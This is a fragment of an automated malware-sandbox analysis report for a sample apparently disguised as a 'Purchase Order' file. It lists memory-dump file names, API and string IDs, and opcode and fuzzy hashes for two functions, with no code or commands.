                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 3446177414-2547482624
                                            • Opcode ID: 689407ff8103eb5f37b352ba4ea4be331dcf4b1f4a6568ff06c6d5dee3a199e3
                                            • Instruction ID: 8e7fc299eb447e00d258b8ad86b36cdc5211665342d8fa40ef8d1e00c16ba325
                                            • Opcode Fuzzy Hash: 689407ff8103eb5f37b352ba4ea4be331dcf4b1f4a6568ff06c6d5dee3a199e3
                                            • Instruction Fuzzy Hash: 4851B1B55047468FD314DF68C544697B7E4EF86304F004A3EEAEA97240E774D685CF92
                                            Function 3481DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0$0
                                            • API String ID: 3446177414-203156872
                                            • Opcode ID: b6b862fd38abd1e8bf48e5f204e9256f92efda0c597db63b13bb0c691a3d5017
                                            • Instruction ID: 4ffecb6f9ecdc13e8adc4e62c9d560ddc355bdd9ad3aa28574a17d1c73c406ed
                                            • Opcode Fuzzy Hash: b6b862fd38abd1e8bf48e5f204e9256f92efda0c597db63b13bb0c691a3d5017
                                            • Instruction Fuzzy Hash: FB415AB66087059FD300CF28C584A1ABBE5BF89758F044A2EF988DB341D775EA05CB96